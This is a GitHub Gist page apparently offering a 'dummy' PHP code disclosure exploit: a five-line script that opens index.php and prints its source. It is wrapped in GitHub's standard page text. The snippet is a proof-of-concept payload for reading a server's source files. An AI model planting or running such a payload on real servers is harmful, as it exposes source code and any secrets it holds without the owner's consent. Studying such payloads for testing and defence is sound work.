Last active
June 27, 2023 07:43
-
-
Save LucasVanHaaren/c66d75283cad294f91a58f403d8ee7af to your computer and use it in GitHub Desktop.
Dummy PHP code disclosure exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$myfile = fopen("index.php", "r") or die("Unable to open file!"); | |
echo fread($myfile,filesize("index.php")); | |
fclose($myfile); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment